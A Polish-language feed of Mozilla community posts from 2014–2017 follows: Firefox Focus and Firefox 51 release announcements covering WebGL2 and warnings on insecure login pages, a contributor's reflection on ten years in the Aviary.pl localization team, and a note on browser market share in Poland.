Zależy nam na tym, żeby użytkownicy mogli dopasować nasze produkty do swoich potrzeb. Wraz z najnowszym wydaniem dajemy użytkownikom możliwość wybrania wyszukiwarki, podobnie jak w Firefoksie na iOS, Windows, czy Mac na komputerach stacjonarnych i laptopach.

Z informacji, jakie od Was dostajemy wiemy, że przeglądanie bez pojawiających się niechcianych reklam i śledzenia jest bardzo ważne. Dlatego wielu użytkowników zdecydowało się na wybór Firefox Focus. W dniu Ochrony Danych Osobowych jesteśmy dumni, że możemy udostępnić przycisk „Usuń” (górny prawy róg przeglądarki) wielu ludziom na całym świecie.

Wasze opinie bardzo się dla nas liczą i na ich podstawie będziemy dodawać nowe funkcje, które sprawią, że przeglądanie stron będzie jeszcze bardziej bezpieczne.

Firefox Focus możesz pobrać z  App Store.

Więcej informacji:

kornelia.gruszka, 26 stycznia 2017, 15:50

24 stycznia 2017

Centrum prasowe Mozilli

Firefox wspiera lepsze gry wideo z WebGL2 i ostrzega przed niezabezpieczonymi stronami

Dzisiejsze wydanie Firefoksa zawiera wiele funkcji dla deweloperów i użytkowników, które umożliwiają lepsze i bezpieczniejsze korzystanie z sieci.

WebGL2  umożliwia stosowanie nowej generacji grafik 3D w sieci

Firefox jest pierwszą przeglądarką, która wspiera WebGL2. Bazując na mocnych fundamentach WebGL1, technologia WebGL2 umożliwia korzystanie z nowoczesnych funkcji kart 3D, takich jak transform feedback, rozszerzone teksturowanie i multisampled rendering. Funkcje te nie były wcześniej dostępne dla przeglądarek internetowych i pozwolą deweloperom tworzyć bardziej wyrafinowane i angażujące treści wizualne.

Pełne wsparcie WebGL2 działa na Windows, Mac OS i Linuksie. Więcej informacji na ten temat można przeczytać tutaj.

Jeśli chcielibyście zobaczyć demo WebGL 2, uaktualnijcie Firefoksa do wersji 51 i sprawdźcie After the Flood przygotowane przez PlayCanvas. Poniżej krótkie wideo przedstawiające demo:

Pomoc w identyfikowaniu niebezpiecznych stron

Bezpieczeństwo użytkowników online jest naszym kluczowym priorytetem i od dawna jesteśmy zwolennikami używania HTTPS, które szyfruje Twoje połączenie i pomaga chronić przed śledzeniem w trakcie korzystania z internetu, od bankowości po kontakt z przyjaciółmi.

Od dzisiaj w Firefoksie strony zbierające hasła, jak serwisy e-mail czy banki, ale niezabezpieczone HTTPS będą zaznaczone jako potencjalne zagrożenie.

Do tej pory Firefox używał zielonej kłódki w okienku URL, aby pokazać, że strona jest zabezpieczna. Jeśli było inaczej, zielona kłódka się nie pojawiała. Aby wyraźniej podkreślić możliwe zagrożenie od teraz pojawia się przekreślona na czerwono szara kłódka.

PRZED:

Bezpieczne połączenie (HTTPS)

Bezpieczne połączenie (HTTPS)

 

 

 

 

3

Niezabezpieczone połączenie (HTTP)

PO ZMIANACH:

4

 

 

 

 

 

Po kliknięciu na ikonkę „i” pokaże się informacja, że „Połączenie nie jest bezpieczne” oraz „Dane logowania wprowadzone na tej stronie nie są chronione”.

Więcej szczegółów na temat tego jak rozpoznać niebezpieczne strony znajduje się tutaj.

Kontynuujemy poprawę responsywności z wieloprocesorowym Firefoksem

W zeszłym roku rozpoczęliśmy udostępnianie wieloprocesorowego Firefoksa użytkownikom korzystającym z wersji desktopowej. Dzięki temu Firefox działa w dwóch procesach – jeden dla interfejsu użytkownika i drugi dla treści na stronie. W rezultacie Firefox działa szybciej i jest bardziej responsywny. Dziś ponad połowa użytkowników Firefoksa korzysta z tego rozwiązania. Aktualne wydanie trafi do jeszcze szerszego grona odbiorców, włączając użytkowników korzystających z urządzeń dotykowych z Windowsem, wymagających ułatwień dostępu czy obsługi tekstów od prawej do lewej.

W nowym wydaniu jest też IndexedDB 2, usprawnienie dla standardu API dla lokalnego przechowywania, które na pewno zainteresuje deweloperów.

 

kornelia.gruszka, 24 stycznia 2017, 16:13

14 czerwca 2015

Hubert Gajewski Online

10 lat z Aviary.pl

Kilka miesięcy temu, dokładnie 30 marca, po ponad 10 latach zakończyłem przygodę z Aviary.pl. Wspomniałem już o tym na Twitterze, ale pomyślałem, że może napiszę coś więcej.

Z AviaryPL (bo tak się to na początku nazywało) zetknąłem się na samym początku, gdy ekipa zwana Team Firefox.pl przekształcała się w oficjalny zespół lokalizacyjny Mozilli, właśnie pod nazwą AviaryPL. Przy samych rzeczach związanych z lokalizacją chciałem działać już wcześniej, ale właśnie kończyłem studia, więc nie chciałem deklarować, że będę się czymś zajmował, wiedząc, że nie mam na to czasu. 23 października 2004 odebrałem dyplom ukończenia studiów i nastał dobry moment na to, by się zaangażować.

Pierwsza okazja nadarzyła się tydzień później. Gandalf przetłumaczył teksty na stronę startową Firefoksa, tuż przed wydaniem wersji 1.0, a ja bez zapowiedzi postanowiłem zrobić korektę.

Kawałek strony w HTML-u

Początki były trudne, bo – jak widać – nie miałem zielonego pojęcia o obsłudze Bugzilli… Nie pierwszy raz robiłem korektę tekstu, ale to był przełomowy moment, który wpłynął na to, że zawodowo zająłem się kontrolą jakości.

Warto wspomnieć w jakim otoczeniu wtedy działaliśmy. Internet Explorer miał ponad 90% rynku, a jedynym kryterium jakości stron internetowych było to, czy działają w przestarzałej, ale „jedynej słusznej” przeglądarce internetowej. Dziś – gdzie możliwość wyboru przeglądarki internetowej to coś normalnego – to może wyglądać dziwnie, ale wtedy czuliśmy, że zmieniamy świat. I wygląda na to, że nam się to udało.

Wróćmy do tematu. Wspomniałem o swoich początkach pracy z Aviary.pl, ale jeszcze wtedy formalnie do grupy nie dołączyłem. A zacząłem się tym zajmować, bo używałem już wtedy Firefoksa i jako użytkownik chciałem, by nie było w nim błędów. Chciałem, żeby „mówił” do mnie poprawną polszczyzną, by w tekście nie było literówek, itp. A roboty było sporo. Choć tego nie widać – polski Firefox zawiera kilkanaście tysięcy różnych tekstów po polsku. Albo inaczej: kilkaset tysięcy słów po polsku.

We wrześniu 2006 roku stałem się członkiem zespołu i wtedy zaczął się kolejny ciekawy etap. Zająłem się na dobre kontrolą jakości Firefoksa, toolkitu (części wspólnej kilku programów Mozilli), mozillowych stron internetowych, KompoZera, tłumaczeniem projektu kalendarza (Mozilla Sunbird i rozszerzenie do Thunderbirda – Lightning) i paru innych rzeczy. Czyli jeszcze więcej pracy.

W kolejnym roku zacząłem proponować nowe rzeczy, które przyjęły się na lata (np. cotygodniowe, krótkie spotkania na IRC-u, czy regularne – 2 razy w roku – spotkania „na żywo”). I chyba dobrze mi szło, bo w kwietniu 2008 powierzono mi kierowanie zespołem. Chyba nie do końca wiedziałem w co się pakuję, ale niczego nie żałuję. Trzeba pamiętać, że Aviary.pl nie jest firmą, gdzie można od kogoś wymagać, że zrobi to, za co mu się płaci. To grupa pasjonatów, skupionych wokół wspólnych celów, którzy za darmo oferują swój cenny czas. Motywowanie takich osób (ludzie czasem tracą zainteresowanie, czasem po prostu mają coś ważniejszego do zrobienia), czy rozwiązywanie konfliktów (ludzie czasem się kłócą) było trudniejsze niż myślałem. Naprawdę dużo się wtedy nauczyłem.

W kwietniu 2012 na spotkaniu w Gdańsku ogłosiłem, że czas na zmiany w zespole i nie będę nim już kierował. Pamiętam pierwszy dzień po spotkaniu, bo to było bardzo ciekawe doświadczenie. Wcześniej na rzeczy związane z Aviary.pl poświęcałem 10-30 godzin tygodniowo. Teraz miałem ten czas dla siebie. I nagle okazało się, że nie wiem, co zrobić z tym czasem. Czułem, jakbym odszedł na emeryturę ;-).

Przez ostatnie 2 lata zajmowałem się głównie kontrolą jakości Lightninga i pomagałem przy starcie systemu Firefox OS.

Po 10 fantastycznych latach uznałem, że czas zrobić coś nowego i – trochę zwlekając – w marcu ogłosiłem swoją decyzję o odejściu z zespołu.

Hubert Gajewski, 14 czerwca 2015, 15:41

6 lipca 2014

Hubert Gajewski Online

Google Chrome najpopularniejszą przeglądarką internetową w Polsce

Ponad 5 lat temu, w marcu 2009, mieliśmy do czynienia z dość istotną zmianą. Po wielu latach panowania Internet Explorer przestał być najpopularniejszą przeglądarką internetową w Polsce, wyprzedził go Firefox, któremu zajęło to ponad 4 lata.

Gdy dobrze przyjrzeć się danym z tamtego okresu – na rynku była już dostępna przeglądarka Chrome, która miała 1% udziału. Od tego czasu trochę się zmieniło. Wg danych firmy Gemius od dwóch tygodni to właśnie Chrome jest najpopularniejszą przeglądarką w Polsce.

Chrome: 34,69%, Fierfox 34,52%, Internet Explorer 12,74%, Opera 6,26%, WebKit Mobile 6,01%, Chrome Mobile 2,41%, Safari 2,41%

Warto zwrócić uwagę, jak przez ten czas zmienił się udział w rynku Internet Explorera – poprzednio ponad 45%, a teraz… niecałe 13%.

Hubert Gajewski, 6 lipca 2014, 18:37